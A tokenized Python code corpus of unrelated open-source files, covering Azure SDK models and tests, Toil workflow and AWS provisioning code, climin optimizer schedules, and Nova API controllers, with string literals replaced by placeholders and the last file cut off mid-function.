<s> from msrest . serialization import Model <EOL> class WorkerPoolCollection ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:value>' : { '<STR_LIT:key>' : '<STR_LIT:value>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> } <EOL> def __init__ ( self , value = None , next_link = None ) : <EOL> self . value = value <EOL> self . next_link = next_link </s>
<s> import unittest <EOL> import azure . mgmt . notificationhubs <EOL> from testutils . common_recordingtestcase import record <EOL> from tests . mgmt_testcase import HttpStatusCode , AzureMgmtTestCase <EOL> class MgmtNotificationHubsTest ( AzureMgmtTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( MgmtNotificationHubsTest , self ) . setUp ( ) <EOL> self . notificationhubs_client = self . create_mgmt_client ( <EOL> azure . mgmt . notificationhubs . NotificationHubsManagementClientConfiguration , <EOL> azure . mgmt . notificationhubs . NotificationHubsManagementClient <EOL> ) <EOL> @ record <EOL> def test_notification_hubs ( self ) : <EOL> self . create_resource_group ( ) <EOL> account_name = self . get_resource_name ( '<STR_LIT>' ) <EOL> output = self . notificationhubs_client . namespaces . check_availability ( <EOL> azure . mgmt . notificationhubs . models . CheckAvailabilityParameters ( <EOL> name = account_name <EOL> ) <EOL> ) <EOL> self . assertTrue ( output . is_availiable ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import base64 <EOL> import sys <EOL> from . _common_models import ( <EOL> _unicode_type , <EOL> ) <EOL> def _encode_base64 ( data ) : <EOL> if isinstance ( data , _unicode_type ) : <EOL> data = data . encode ( '<STR_LIT:utf-8>' ) <EOL> encoded = base64 . b64encode ( data ) <EOL> return encoded . decode ( '<STR_LIT:utf-8>' ) <EOL> def _decode_base64_to_bytes ( data ) : <EOL> if isinstance ( data , _unicode_type ) : <EOL> data = data . encode ( '<STR_LIT:utf-8>' ) <EOL> return base64 . b64decode ( data ) <EOL> def _decode_base64_to_text ( data ) : <EOL> decoded_bytes = _decode_base64_to_bytes ( data ) <EOL> return decoded_bytes . decode ( '<STR_LIT:utf-8>' ) <EOL> if sys . version_info < ( <NUM_LIT:3> , ) : <EOL> def _str ( value ) : <EOL> if isinstance ( value , unicode ) : <EOL> return value . encode ( '<STR_LIT:utf-8>' ) <EOL> return str ( value ) <EOL> else : <EOL> _str = str <EOL> def _str_or_none ( value ) : <EOL> if value is None : <EOL> return None <EOL> return _str ( value ) <EOL> def _int_or_none ( value ) : <EOL> if value is None : <EOL> return None <EOL> return str ( int ( value ) ) <EOL> def _bool_or_none ( value ) : <EOL> if value is None : <EOL> return None <EOL> if isinstance ( value , bool ) : <EOL> if value : <EOL> return '<STR_LIT:true>' <EOL> else : <EOL> return '<STR_LIT:false>' <EOL> return str ( value ) <EOL> def _lower ( text ) : <EOL> return text . lower ( ) </s>
<s> from setuptools import setup <EOL> try : <EOL> import azure <EOL> try : <EOL> ver = azure . __version__ <EOL> raise Exception ( <EOL> '<STR_LIT>' . format ( ver ) + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' <EOL> ) <EOL> except AttributeError : <EOL> pass <EOL> except ImportError : <EOL> pass <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> zip_safe = False , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from azure . common import ( <EOL> AzureException , <EOL> AzureHttpError , <EOL> ) <EOL> from . _error import ( <EOL> _ERROR_ATTRIBUTE_MISSING , <EOL> ) <EOL> class AzureBatchValidationError ( AzureException ) : <EOL> '''<STR_LIT>''' <EOL> class AzureBatchOperationError ( AzureHttpError ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , message , status_code , batch_code ) : <EOL> super ( AzureBatchOperationError , self ) . __init__ ( message , status_code ) <EOL> self . code = batch_code <EOL> class Entity ( dict ) : <EOL> '''<STR_LIT>''' <EOL> def __getattr__ ( self , name ) : <EOL> try : <EOL> return self [ name ] <EOL> except KeyError : <EOL> raise AttributeError ( _ERROR_ATTRIBUTE_MISSING . format ( '<STR_LIT>' , name ) ) <EOL> __setattr__ = dict . __setitem__ <EOL> def __delattr__ ( self , name ) : <EOL> try : <EOL> del self [ name ] <EOL> except KeyError : <EOL> raise AttributeError ( _ERROR_ATTRIBUTE_MISSING . format ( '<STR_LIT>' , name ) ) <EOL> def __dir__ ( self ) : <EOL> return dir ( { } ) + list ( self . keys ( ) ) <EOL> class EntityProperty ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , type = None , value = None ) : <EOL> '''<STR_LIT>''' <EOL> self . type = type <EOL> self . value = value <EOL> class Table ( object ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> class TablePayloadFormat ( object ) : <EOL> '''<STR_LIT>''' <EOL> JSON_NO_METADATA = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> JSON_MINIMAL_METADATA = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> JSON_FULL_METADATA = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> class EdmType ( object ) : <EOL> '''<STR_LIT>''' <EOL> BINARY = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> INT64 = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> GUID = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> DATETIME = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> STRING = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> INT32 = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> DOUBLE = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> BOOLEAN = '<STR_LIT>' <EOL> '''<STR_LIT>''' <EOL> class TablePermissions ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , query = False , add = False , update = False , delete = False , _str = None ) : <EOL> '''<STR_LIT>''' <EOL> if not _str : <EOL> _str = '<STR_LIT>' <EOL> self . query = query or ( '<STR_LIT:r>' in _str ) <EOL> self . add = add or ( '<STR_LIT:a>' in _str ) <EOL> self . update = update or ( '<STR_LIT:u>' in _str ) <EOL> self . delete = delete or ( '<STR_LIT:d>' in _str ) <EOL> def __or__ ( self , other ) : <EOL> return TablePermissions ( _str = str ( self ) + str ( other ) ) <EOL> def __add__ ( self , other ) : <EOL> return TablePermissions ( _str = str ( self ) + str ( other ) ) <EOL> def __str__ ( self ) : <EOL> return ( ( '<STR_LIT:r>' if self . query else '<STR_LIT>' ) + <EOL> ( '<STR_LIT:a>' if self . add else '<STR_LIT>' ) + <EOL> ( '<STR_LIT:u>' if self . update else '<STR_LIT>' ) + <EOL> ( '<STR_LIT:d>' if self . delete else '<STR_LIT>' ) ) <EOL> TablePermissions . QUERY = TablePermissions ( query = True ) <EOL> TablePermissions . ADD = TablePermissions ( add = True ) <EOL> TablePermissions . UPDATE = TablePermissions ( update = True ) <EOL> TablePermissions . DELETE = TablePermissions ( delete = True ) </s>
<s> from __future__ import absolute_import <EOL> from collections import namedtuple <EOL> TaskData = namedtuple ( '<STR_LIT>' , ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> class ResourceRequirement ( namedtuple ( '<STR_LIT>' , ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) ) : <EOL> def size ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . cores <EOL> ToilJob = namedtuple ( '<STR_LIT>' , ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) </s>
<s> import logging <EOL> import re <EOL> import time <EOL> from collections import Iterable <EOL> from urllib2 import urlopen <EOL> import boto . ec2 <EOL> from bd2k . util import memoize <EOL> from bd2k . util . iterables import concat <EOL> from boto . ec2 . instance import Instance <EOL> from cgcloud . lib . ec2 import wait_for_spot_instances , ec2_instance_types , wait_transition <EOL> from cgcloud . lib . util import papply <EOL> from toil . batchSystems . abstractBatchSystem import AbstractScalableBatchSystem , AbstractBatchSystem <EOL> from toil . common import Config <EOL> from toil . provisioners . abstractProvisioner import AbstractProvisioner , Shape <EOL> log = logging . getLogger ( __name__ ) <EOL> def switch ( false , true ) : <EOL> return { False : false , True : true } <EOL> class AWSProvisioner ( AbstractProvisioner ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , config , batchSystem ) : <EOL> """<STR_LIT>""" <EOL> super ( AWSProvisioner , self ) . __init__ ( ) <EOL> self . batchSystem = batchSystem <EOL> ami , instanceType = '<STR_LIT::>' . split ( config . nodeOptions ) <EOL> preemptableAmi , preemptableInstanceType = '<STR_LIT::>' . split ( config . preemptableNodeOptions ) <EOL> self . ami = switch ( ami , preemptableAmi ) <EOL> self . instanceType = switch ( instanceType , preemptableInstanceType ) <EOL> for instanceType in self . instanceType . values ( ) : <EOL> try : <EOL> instanceType = ec2_instance_types [ instanceType ] <EOL> except KeyError : <EOL> raise RuntimeError ( "<STR_LIT>" % instanceType ) <EOL> else : <EOL> if instanceType . disks == <NUM_LIT:0> : <EOL> raise RuntimeError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % instanceType . name ) <EOL> self . spotBid = config . preemptableBidPrice <EOL> def addNodes ( self , numNodes = <NUM_LIT:1> , preemptable = False ) : <EOL> instanceSpec = dict ( image_id = self . ami [ preemptable ] , <EOL> key_name = self . _keyName , <EOL> user_data = self . _userData ( ) , <EOL> instance_type = self . instanceType [ preemptable ] , <EOL> instance_profile_arn = self . _instanceProfileArn ( ) , <EOL> security_group_ids = self . _securityGroupIds , <EOL> ebs_optimized = self . ebsOptimized , <EOL> dry_run = False ) <EOL> if preemptable : <EOL> requests = self . _ec2 . request_spot_instances ( price = self . spotBid , <EOL> count = numNodes , <EOL> placement = self . _availabilityZone ( ) , <EOL> placement_group = None , <EOL> launch_group = None , <EOL> availability_zone_group = None , <EOL> ** instanceSpec ) <EOL> instances = wait_for_spot_instances ( self . _ec2 , requests ) <EOL> else : <EOL> reservation = self . _ec2 . run_instances ( min_count = numNodes , <EOL> max_count = numNodes , <EOL> ** instanceSpec ) <EOL> instances = reservation . instances <EOL> def wait_running ( instance ) : <EOL> wait_transition ( instance , from_states = { '<STR_LIT>' } , to_state = '<STR_LIT>' ) <EOL> assert len ( instances ) == numNodes <EOL> papply ( wait_running , instances ) <EOL> if isinstance ( self . batchSystem , AbstractScalableBatchSystem ) : <EOL> while instances : <EOL> numNodes = self . batchSystem . getNodes ( ) <EOL> for address in numNodes . keys ( ) : <EOL> instances . remove ( address ) <EOL> time . sleep ( <NUM_LIT:10> ) <EOL> def removeNodes ( self , numNodes = <NUM_LIT:1> , preemptable = False ) : <EOL> instances = self . _getAllInstances ( ) <EOL> if isinstance ( self . batchSystem , AbstractScalableBatchSystem ) : <EOL> instances = { instance . private_ip_address : instance for instance in instances } <EOL> nodeLoad = self . batchSystem . getNodes ( preemptable ) <EOL> nodes = [ ( nodeAddress , instances . get ( nodeAddress ) , nodeInfo ) <EOL> for nodeAddress , nodeInfo in nodeLoad . iteritems ( ) ] <EOL> def by_load_and_youth ( ( nodeAddress , instance , nodeInfo ) ) : <EOL> return nodeInfo . workers , nodeInfo . cores , instance . launchTime if instance else <NUM_LIT:0> <EOL> nodes . sort ( key = by_load_and_youth ) <EOL> else : <EOL> nodes = [ ( instance . private_ip_address , instance , None ) for instance in instances ] <EOL> def by_youth ( ( nodeAddress , instance , nodeInfo ) ) : <EOL> return instance . launch_time , nodeAddress <EOL> nodes . sort ( key = by_youth ) <EOL> assert numNodes <= len ( nodes ) <EOL> nodes = nodes [ : numNodes ] <EOL> instanceIds = [ instance . id for nodeAddress , instance , nodeInfo in nodes ] <EOL> self . _ec2 . terminate_instances ( instance_ids = instanceIds ) <EOL> def getNumberOfNodes ( self , preemptable = False ) : <EOL> instanceIds = { instance . id for instance in self . _getAllInstances ( ) } <EOL> assert self . _instanceId in instanceIds <EOL> return len ( instanceIds ) - <NUM_LIT:1> <EOL> def getNodeShape ( self , preemptable = False ) : <EOL> instanceType = ec2_instance_types [ self . instanceType [ preemptable ] ] <EOL> return Shape ( wallTime = <NUM_LIT> * <NUM_LIT> , <EOL> memory = instanceType . memory , <EOL> cores = instanceType . cores , <EOL> disk = instanceType . disks * instanceType . disk_capacity ) <EOL> def _getAllInstances ( self ) : <EOL> """<STR_LIT>""" <EOL> reservations = self . _ec2 . get_all_reservations ( filters = { <EOL> '<STR_LIT>' : self . _instanceId , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return concat ( r . instances for r in reservations ) <EOL> @ classmethod <EOL> def _instanceData ( cls , path ) : <EOL> return urlopen ( '<STR_LIT>' + path ) . read ( ) <EOL> @ classmethod <EOL> def _metaData ( cls , path ) : <EOL> return cls . _instanceData ( '<STR_LIT>' + path ) <EOL> @ classmethod <EOL> def _userData ( cls ) : <EOL> user_data = cls . _instanceData ( '<STR_LIT>' ) <EOL> log . info ( "<STR_LIT>" , user_data ) <EOL> return user_data <EOL> @ property <EOL> @ memoize <EOL> def _nodeIP ( self ) : <EOL> ip = self . _metaData ( '<STR_LIT>' ) <EOL> log . info ( "<STR_LIT>" , ip ) <EOL> return ip <EOL> @ property <EOL> @ memoize <EOL> def _instanceId ( self ) : <EOL> instance_id = self . _metaData ( '<STR_LIT>' ) <EOL> log . info ( "<STR_LIT>" , instance_id ) <EOL> return instance_id <EOL> @ property <EOL> @ memoize <EOL> def _availabilityZone ( self ) : <EOL> zone = self . _metaData ( '<STR_LIT>' ) <EOL> log . info ( "<STR_LIT>" , zone ) <EOL> return zone <EOL> @ property <EOL> @ memoize <EOL> def _region ( self ) : <EOL> m = re . match ( r'<STR_LIT>' , self . _availabilityZone ) <EOL> assert m <EOL> region = m . group ( <NUM_LIT:1> ) <EOL> log . info ( "<STR_LIT>" , region ) <EOL> return region <EOL> @ property <EOL> @ memoize <EOL> def _ec2 ( self ) : <EOL> return boto . ec2 . connect_to_region ( self . _region ) <EOL> @ property <EOL> @ memoize <EOL> def _keyName ( self ) : <EOL> return self . _instance . key_name <EOL> @ property <EOL> @ memoize <EOL> def _instance ( self ) : <EOL> return self . _getInstance ( self . _instanceId ) <EOL> @ property <EOL> @ memoize <EOL> def _securityGroupIds ( self ) : <EOL> return [ sg . id for sg in self . _instance . groups ] <EOL> @ property <EOL> @ memoize <EOL> def _instanceProfileArn ( self ) : <EOL> return self . _instance . instance_profile . arn <EOL> def _getInstance ( self , instance_id ) : <EOL> """<STR_LIT>""" <EOL> reservations = self . _ec2 . get_all_reservations ( instance_ids = [ instance_id ] ) <EOL> instances = ( i for r in reservations for i in r . instances if i . id == instance_id ) <EOL> instance = next ( instances ) <EOL> assert next ( instances , None ) is None <EOL> return instance <EOL> @ property <EOL> @ memoize <EOL> def ebsOptimized ( self ) : <EOL> return self . _instance . ebs_optimized </s>
<s> from __future__ import absolute_import <EOL> from toil . common import Toil , ToilContextManagerMisuseException <EOL> from toil . job import Job <EOL> from toil . test import ToilTest <EOL> class ToilContextManagerTest ( ToilTest ) : <EOL> def testContextManger ( self ) : <EOL> options = Job . Runner . getDefaultOptions ( self . _getTestJobStorePath ( ) ) <EOL> options . logLevel = '<STR_LIT>' <EOL> with Toil ( options ) as toil : <EOL> toil . start ( HelloWorld ( ) ) <EOL> def testNoContextManger ( self ) : <EOL> options = Job . Runner . getDefaultOptions ( self . _getTestJobStorePath ( ) ) <EOL> options . logLevel = '<STR_LIT>' <EOL> toil = Toil ( options ) <EOL> self . assertRaises ( ToilContextManagerMisuseException , toil . start , HelloWorld ( ) ) <EOL> class HelloWorld ( Job ) : <EOL> def __init__ ( self ) : <EOL> Job . __init__ ( self , memory = <NUM_LIT> , cores = <NUM_LIT:2> , disk = '<STR_LIT>' ) <EOL> def run ( self , fileStore ) : <EOL> fileID = self . addChildJobFn ( childFn , cores = <NUM_LIT:1> , memory = '<STR_LIT>' , disk = '<STR_LIT>' ) . rv ( ) <EOL> self . addFollowOn ( FollowOn ( fileID ) ) <EOL> def childFn ( job ) : <EOL> with job . fileStore . writeGlobalFileStream ( ) as ( fH , fileID ) : <EOL> fH . write ( "<STR_LIT>" ) <EOL> return fileID <EOL> class FollowOn ( Job ) : <EOL> def __init__ ( self , fileId ) : <EOL> Job . __init__ ( self ) <EOL> self . fileId = fileId <EOL> def run ( self , fileStore ) : <EOL> tempDir = fileStore . getLocalTempDir ( ) <EOL> tempFilePath = "<STR_LIT:/>" . join ( [ tempDir , '<STR_LIT>' ] ) <EOL> with fileStore . readGlobalFileStream ( self . fileId ) as globalFile : <EOL> with open ( tempFilePath , "<STR_LIT:w>" ) as localFile : <EOL> localFile . write ( globalFile . read ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> import math <EOL> import numpy as np <EOL> def decaying ( start , decay ) : <EOL> """<STR_LIT>""" <EOL> return ( start * decay ** i for i in itertools . count ( <NUM_LIT:0> ) ) <EOL> def linear_annealing ( start , stop , n_steps ) : <EOL> """<STR_LIT>""" <EOL> start , stop = float ( start ) , float ( stop ) <EOL> inc = ( stop - start ) / n_steps <EOL> for i in range ( n_steps ) : <EOL> yield start + i * inc <EOL> while True : <EOL> yield stop <EOL> def repeater ( iter , n ) : <EOL> """<STR_LIT>""" <EOL> for i in iter : <EOL> for j in range ( n ) : <EOL> yield i <EOL> class SutskeverBlend ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , max_momentum , stretch = <NUM_LIT> ) : <EOL> self . max_momentum = max_momentum <EOL> self . stretch = stretch <EOL> def __iter__ ( self ) : <EOL> for i in itertools . count ( <NUM_LIT:1> ) : <EOL> m = <NUM_LIT:1> - ( <NUM_LIT:2> ** ( - <NUM_LIT:1> - math . log ( np . floor_divide ( i , self . stretch ) + <NUM_LIT:1> , <NUM_LIT:2> ) ) ) <EOL> yield min ( m , self . max_momentum ) </s>
<s> from __future__ import absolute_import <EOL> import nose <EOL> import itertools <EOL> from climin import Sbfgs <EOL> from . losses import Quadratic , LogisticRegression , Rosenbrock <EOL> @ nose . tools . nottest <EOL> def test_sbfgs_quadratic ( ) : <EOL> obj = Quadratic ( ) <EOL> opt = Sbfgs ( obj . pars , obj . f , obj . fprime ) <EOL> for i , info in enumerate ( opt ) : <EOL> if i > <NUM_LIT:50> : <EOL> break <EOL> assert obj . solved ( ) , '<STR_LIT>' <EOL> def test_sbfgs_rosen ( ) : <EOL> obj = Rosenbrock ( ) <EOL> opt = Sbfgs ( obj . pars , obj . f , obj . fprime ) <EOL> for i , info in enumerate ( opt ) : <EOL> if i > <NUM_LIT:20> : <EOL> break <EOL> assert obj . solved ( ) , '<STR_LIT>' <EOL> @ nose . tools . nottest <EOL> def test_sbfgs_lr ( ) : <EOL> obj = LogisticRegression ( ) <EOL> args = itertools . repeat ( ( ( obj . X , obj . Z ) , { } ) ) <EOL> opt = Sbfgs ( obj . pars , obj . f , obj . fprime , args = args ) <EOL> for i , info in enumerate ( opt ) : <EOL> if i > <NUM_LIT:50> : <EOL> break <EOL> assert obj . solved ( ) , '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> import nova . api . openstack <EOL> from nova . api . openstack . compute import extension_info <EOL> from nova . api . openstack . compute . legacy_v2 import consoles as v2_consoles <EOL> from nova . api . openstack . compute . legacy_v2 import extensions as v2_extensions <EOL> from nova . api . openstack . compute . legacy_v2 import flavors as v2_flavors <EOL> from nova . api . openstack . compute . legacy_v2 import image_metadata as v2_image_metadata <EOL> from nova . api . openstack . compute . legacy_v2 import images as v2_images <EOL> from nova . api . openstack . compute . legacy_v2 import ips as v2_ips <EOL> from nova . api . openstack . compute . legacy_v2 import limits as v2_limits <EOL> from nova . api . openstack . compute . legacy_v2 import server_metadata as v2_server_metadata <EOL> from nova . api . openstack . compute . legacy_v2 import servers as v2_servers <EOL> from nova . api . openstack . compute . legacy_v2 import versions as legacy_v2_versions <EOL> from nova . i18n import _LW <EOL> allow_instance_snapshots_opt = cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = True , <EOL> help = '<STR_LIT>' ) <EOL> CONF = cfg . CONF <EOL> CONF . register_opt ( allow_instance_snapshots_opt ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class APIRouter ( nova . api . openstack . APIRouter ) : <EOL> """<STR_LIT>""" <EOL> ExtensionManager = v2_extensions . ExtensionManager <EOL> def __init__ ( self , ext_mgr = None , init_only = None ) : <EOL> LOG . warning ( _LW ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> super ( APIRouter , self ) . __init__ ( ext_mgr = ext_mgr , <EOL> init_only = init_only ) <EOL> def _setup_routes ( self , mapper , ext_mgr , init_only ) : <EOL> if init_only is None or '<STR_LIT>' in init_only : <EOL> self . resources [ '<STR_LIT>' ] = legacy_v2_versions . create_resource ( ) <EOL> mapper . connect ( "<STR_LIT>" , "<STR_LIT:/>" , <EOL> controller = self . resources [ '<STR_LIT>' ] , <EOL> action = '<STR_LIT>' , <EOL> conditions = { "<STR_LIT>" : [ '<STR_LIT:GET>' ] } ) <EOL> mapper . redirect ( "<STR_LIT>" , "<STR_LIT:/>" ) <EOL> if init_only is None or '<STR_LIT>' in init_only : <EOL> self . resources [ '<STR_LIT>' ] = v2_consoles . create_resource ( ) <EOL> mapper . resource ( "<STR_LIT>" , "<STR_LIT>" , <EOL> controller = self . resources [ '<STR_LIT>' ] , <EOL> parent_resource = dict ( member_name = '<STR_LIT>' , <EOL> collection_name = '<STR_LIT>' ) ) <EOL> if init_only is None or '<STR_LIT>' in init_only or '<STR_LIT>' in init_only or '<STR_LIT>' in init_only : <EOL> self . resources [ '<STR_LIT>' ] = v2_servers . create_resource ( ext_mgr ) <EOL> mapper . resource ( "<STR_LIT>" , "<STR_LIT>" , <EOL> controller = self . resources [ '<STR_LIT>' ] , <EOL> collection = { '<STR_LIT>' : '<STR_LIT:GET>' } , <EOL> member = { '<STR_LIT:action>' : '<STR_LIT:POST>' } ) <EOL> if init_only is None or '<STR_LIT>' in init_only : <EOL> self . resources [ '<STR_LIT>' ] = v2_ips . create_resource ( ) <EOL> mapper . resource ( "<STR_LIT>" , "<STR_LIT>" , controller = self . resources [ '<STR_LIT>' ] , <EOL> parent_resource = dict ( member_name = '<STR_LIT>' , <EOL> collection_name = '<STR_LIT>' ) ) <EOL> if init_only is None or '<STR_LIT>' in init_only : <EOL> self . resources [ '<STR_LIT>' ] = v2_images . create_resource ( ) <EOL> mapper . resource ( "<STR_LIT:image>" , "<STR_LIT>" , <EOL> controller = self . resources [ '<STR_LIT>' ] , <EOL> collection = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> if init_only is None or '<STR_LIT>' in init_only : <EOL> self . resources [ '<STR_LIT>' ] = v2_limits . create_resource ( ) <EOL> mapper . resource ( "<STR_LIT>" , "<STR_LIT>" , <EOL> controller = self . resources [ '<STR_LIT>' ] ) <EOL> if init_only is None or '<STR_LIT>' in init_only : <EOL> self . resources [ '<STR_LIT>' ] = v2_flavors . create_resource ( ) <EOL> mapper . resource ( "<STR_LIT>" , "<STR_LIT>" , <EOL> controller = self . resources [ '<STR_LIT>' ] , <EOL> collection = { '<STR_LIT>' : '<STR_LIT:GET>' } , <EOL> member = { '<STR_LIT:action>' : '<STR_LIT:POST>' } ) <EOL> if init_only is None or '<STR_LIT>' in init_only : <EOL> v2immeta = v2_image_metadata <EOL> self . resources [ '<STR_LIT>' ] = v2immeta . create_resource ( ) <EOL> image_metadata_controller = self . resources [ '<STR_LIT>' ] <EOL> mapper . resource ( "<STR_LIT>" , "<STR_LIT>" , <EOL> controller = image_metadata_controller , <EOL> parent_resource = dict ( member_name = '<STR_LIT:image>' , <EOL> collection_name = '<STR_LIT>' ) ) <EOL> mapper . connect ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> controller = image_metadata_controller , <EOL> action = '<STR_LIT>' , <EOL> conditions = { "<STR_LIT>" : [ '<STR_LIT>' ] } ) <EOL> if init_only is None or '<STR_LIT>' in init_only : <EOL> self . resources [ '<STR_LIT>' ] = v2_server_metadata . create_resource ( ) <EOL> server_metadata_controller = self . resources [ '<STR_LIT>' ] <EOL> mapper . resource ( "<STR_LIT>" , "<STR_LIT>" , <EOL> controller = server_metadata_controller , <EOL> parent_resource = dict ( member_name = '<STR_LIT>' , <EOL> collection_name = '<STR_LIT>' ) ) <EOL> mapper . connect ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> controller = server_metadata_controller , <EOL> action = '<STR_LIT>' , <EOL> conditions = { "<STR_LIT>" : [ '<STR_LIT>' ] } ) <EOL> class APIRouterV21 ( nova . api . openstack . APIRouterV21 ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , init_only = None ) : <EOL> self . _loaded_extension_info = extension_info . LoadedExtensionInfo ( ) <EOL> super ( APIRouterV21 , self ) . __init__ ( init_only ) <EOL> def _register_extension ( self , ext ) : <EOL> return self . loaded_extension_info . register_extension ( ext . obj ) <EOL> @ property <EOL> def loaded_extension_info ( self ) : <EOL> return self . _loaded_extension_info </s>
<s> """<STR_LIT>""" <EOL> import webob <EOL> from nova . api . openstack import api_version_request <EOL> from nova . api . openstack import common <EOL> from nova . api . openstack . compute . schemas import flavor_access <EOL> from nova . api . openstack import extensions <EOL> from nova . api . openstack import wsgi <EOL> from nova . api import validation <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova import objects <EOL> ALIAS = '<STR_LIT>' <EOL> soft_authorize = extensions . os_compute_soft_authorizer ( ALIAS ) <EOL> authorize = extensions . os_compute_authorizer ( ALIAS ) <EOL> def _marshall_flavor_access ( flavor ) : <EOL> rval = [ ] <EOL> for project_id in flavor . projects : <EOL> rval . append ( { '<STR_LIT>' : flavor . flavorid , <EOL> '<STR_LIT>' : project_id } ) <EOL> return { '<STR_LIT>' : rval } <EOL> class FlavorAccessController ( wsgi . Controller ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( FlavorAccessController , self ) . __init__ ( ) <EOL> @ extensions . expected_errors ( <NUM_LIT> ) <EOL> def index ( self , req , flavor_id ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context ) <EOL> flavor = common . get_flavor ( context , flavor_id ) <EOL> if flavor . is_public : <EOL> explanation = _ ( "<STR_LIT>" ) <EOL> raise webob . exc . HTTPNotFound ( explanation = explanation ) <EOL> return _marshall_flavor_access ( flavor ) <EOL> class FlavorActionController ( wsgi . Controller ) : <EOL> """<STR_LIT>""" <EOL> def _extend_flavor ( self , flavor_rval , flavor_ref ) : <EOL> key = "<STR_LIT>" % ( FlavorAccess . alias ) <EOL> flavor_rval [ key ] = flavor_ref [ '<STR_LIT>' ] <EOL> @ wsgi . extends <EOL> def show ( self , req , resp_obj , id ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> if soft_authorize ( context ) : <EOL> db_flavor = req . get_db_flavor ( id ) <EOL> self . _extend_flavor ( resp_obj . obj [ '<STR_LIT>' ] , db_flavor ) <EOL> @ wsgi . extends <EOL> def detail ( self , req , resp_obj ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> if soft_authorize ( context ) : <EOL> flavors = list ( resp_obj . obj [ '<STR_LIT>' ] ) <EOL> for flavor_rval in flavors : <EOL> db_flavor = req . get_db_flavor ( flavor_rval [ '<STR_LIT:id>' ] ) <EOL> self . _extend_flavor ( flavor_rval , db_flavor ) <EOL> @ wsgi . extends ( action = '<STR_LIT>' ) <EOL> def create ( self , req , body , resp_obj ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> if soft_authorize ( context ) : <EOL> db_flavor = req . get_db_flavor ( resp_obj . obj [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> self . _extend_flavor ( resp_obj . obj [ '<STR_LIT>' ] , db_flavor ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( "<STR_LIT>" ) <EOL> @ validation . schema ( flavor_access . add_tenant_access ) <EOL> def _add_tenant_access ( self , req , id , body ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = "<STR_LIT>" ) <EOL> vals = body [ '<STR_LIT>' ] <EOL> tenant = vals [ '<STR_LIT>' ] <EOL> flavor = common . get_flavor ( context , id ) <EOL> try : <EOL> if api_version_request . is_supported ( req , min_version = '<STR_LIT>' ) : <EOL> if flavor . is_public : 